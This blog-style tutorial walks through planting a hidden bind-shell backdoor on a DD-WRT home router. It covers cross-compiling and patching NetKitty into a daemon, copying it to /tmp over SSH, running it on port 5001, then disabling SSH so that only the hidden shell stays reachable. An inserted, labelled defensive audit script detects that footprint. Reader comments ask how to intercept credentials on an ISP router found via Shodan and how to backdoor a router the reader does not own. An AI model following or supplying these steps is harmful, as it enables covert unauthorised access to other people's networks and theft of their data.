How To: Install a Hidden Backdoor in a Home Router

In this short tutorial I will show you the basic concepts of how to install your own software on a home router. It can be a backdoor, but it can also be a special monitoring tool or service. We will make some assumptions to keep this tutorial short and simple.

  1. You have access to the router's control panel. This is the case when you own your router and you are practising your security skills on your own network.
  2. The router is running some open firmware. In this tutorial I'm assuming it is running DD-WRT.

Step 1: Enable SSH Access

You can find out how to do that on the official DD-WRT page. Basically you have to click a couple of radio buttons, or type some commands on the command line.

SSH access is required to copy our software to the router and also to launch it.

Step 2: Get Information About the Architecture

As you are using your own router you probably already know this, but just in case, here are some tips.

  • Log in to the router using SSH (you have just enabled it).
  • On the command line type uname -m. This command will tell you the type of processor installed in your router. It will probably be a MIPS SoC.
  • Also type cat /proc/cpuinfo to get further details.

Step 3: Get the Appropriate Toolchain

Now you need to get (or build) a toolchain for your router platform. In my case I just got one of the official DD-WRT toolchains for MIPS. I got the information from a post in the DD-WRT forums.

Download the toolchain and install it.

Step 4: Installing the Toolchain

In general, you just need to do two things to install a toolchain.

  • Uncompress the toolchain package somewhere on your disk.
  • Add the directory containing the toolchain binaries to your PATH.

The whole sequence is shown in the screenshot below.

The tools will all be prefixed with mips-.

For the specific toolchain I am using, the prefix is actually mips-linux-. That's important if you have to cross-compile autotools packages, but we are not going to talk about that here.

Step 5: Compiling

To keep this tutorial simple, I'm going to use, once again, Netkitty. This tool is pretty convenient because it does not rely on any external library and therefore we can just compile it. I'm not covering in this tutorial how to compile other tools that require libraries. You can find a lot of information on the Internet about cross-compiling and staging packages, in case you need to do that.

To compile NetKitty we just need to do:

You will need to edit the source code to make three changes:

  • In line 362 change bash to sh.
  • In line 424 just before the while add a line saying daemon(0,1); (man daemon for details).
  • In line 517 delete "use_sin =" at the beginning of the line.

Those changes convert NetKitty into a daemon, so we won't need to use screen or nohup to keep it running after our SSH session is closed.

Step 6: Copy and Run

Now you just need to move the file to the router. We will copy our nk-mips binary to the /tmp/ directory. This folder always has write permission and usually also execute permission. As we've enabled SSH, we can copy the file using scp and execute it remotely using ssh.

scp nk-mips root@router-ip:/tmp
ssh root@router-ip "/tmp/nk-mips -shell -s T,5001"

Step 7: Disable SSH Access

Now that your remote shell is running, you can disable SSH access in the control panel and log into the router just by connecting to port 5001 with netcat:

nc router-ip 5001
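A defender-side check for the footprint the seven steps above leave on the router, written here as an added example that is not part of the original tutorial: it parses BusyBox netstat and ps output (constructed sample text below, assumed to match the router's real output format) and flags a listener on a port the router is not expected to serve, plus any process executing from /tmp.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Audits a DD-WRT router for a binary
# running from /tmp and a TCP listener on an unexpected port. The netstat/ps text is
# constructed sample data so this runs offline; on a router, feed it live output.

# Constructed sample of `netstat -tln` as BusyBox prints it (assumption).
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5001            0.0.0.0:*               LISTEN'

# Constructed sample of BusyBox `ps` output (assumption).
SAMPLE_PS='  PID USER       VSZ STAT COMMAND
    1 root      1396 S    init
  412 root      2104 S    httpd
  520 root      1100 S    dnsmasq
  731 root       980 S    /tmp/nk-mips -shell -s T,5001'

# Ports this router is expected to listen on (constructed allowlist, assumption).
EXPECTED_PORTS="22 53 80 443"

# Read netstat text on stdin; print listening TCP ports not in EXPECTED_PORTS.
unexpected_listeners() {
  awk -v allow="$EXPECTED_PORTS" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 ~ /^tcp/ && $NF == "LISTEN" {
      port = $4; sub(/.*:/, "", port)      # strip the address, keep the port
      if (!(port in ok)) print port
    }'
}

# Read ps text on stdin; print PID and program of every process running from /tmp.
tmp_processes() {
  awk 'NR > 1 && $5 ~ /^\/tmp\// { print $1, $5 }'
}

# Run both checks on the samples. Returns 0 when clean, 1 when something was found.
audit() {
  listeners=$(printf '%s\n' "$SAMPLE_NETSTAT" | unexpected_listeners)
  tmpprocs=$(printf '%s\n' "$SAMPLE_PS" | tmp_processes)
  [ -z "$listeners" ] && [ -z "$tmpprocs" ] && return 0
  [ -n "$listeners" ] && echo "unexpected TCP listener(s): $listeners"
  [ -n "$tmpprocs" ] && echo "process(es) running from /tmp: $tmpprocs"
  return 1
}

if audit; then echo "no findings"; else echo "review the findings above"; fi
```

On the sample data the script reports port 5001 and PID 731 running /tmp/nk-mips, exactly what Steps 6 and 7 leave behind; a reboot clears /tmp, so the same check after a reboot tells you whether something has been made persistent.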

CONCLUSION

This was a pretty simple example to demonstrate how to run your own software on your home router. From here you can explore how to deploy more complex tools that depend on external libraries, how to get your applications installed on the router so they are re-launched after a reboot... Lots of fun!

5 Comments

Very thorough and well written. I'd just like to point out a possible typo or error: "scp nk-mips root@router-ip/tmp"

It should have a colon after the remote host, like this:
scp nk-mips user@host:/dirs/

Just letting you know so as to attract fewer questions from newbies who don't realise that the command is missing a character.

TRT

Thanks TRT and good catch. It was indeed a typo. I have fixed it.

I found my ISP router using Shodan, and got the password. Is it possible to launch a sort of MITM to collect data and creds?

First, you have to understand that accessing somebody else's router is illegal.

That said, high-performance routers are a different beast and they run special operating systems. Cisco routers used to run IOS (not sure if that is still the case), which seems to be based on QNX; Juniper routers use JunOS, based on FreeBSD, and, according to the Wikipedia page, there is an SDK available.

I never had a chance to work with any of those systems so I cannot really answer your question. I would suggest you do some research to find out what is possible.

What if the router is not mine and I don't have access to the control panel?
I want to install a sort-of backdoor to get the password of the network whenever I want. Is that possible?